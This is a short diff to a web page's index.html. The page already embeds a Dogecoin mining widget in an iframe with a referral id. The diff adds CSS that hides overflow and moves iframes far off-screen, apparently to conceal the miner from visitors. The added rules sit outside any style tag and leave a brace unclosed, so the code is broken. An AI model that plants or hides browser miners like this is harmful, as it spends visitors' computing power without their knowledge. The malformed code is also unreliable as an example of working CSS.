--- a/index.html
+++ b/index.html
@@ -155,7 +155,8 @@
 			<center>
 			            <h1 style="font-family: monospace;">Dogecoin Miner To Support Me</h1>
 			<iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/dogecoin/?ref=F374612CD53C&mode=widget" style="overflow:hidden;width:324px;height:470px;"></iframe>
+				body { height: 100%; width: 100%; overflow: hidden;
+				iframe { top: 500%; left: 500%; }
 			<center>
-		<footer>
-			
+		<footer>			
 </html>
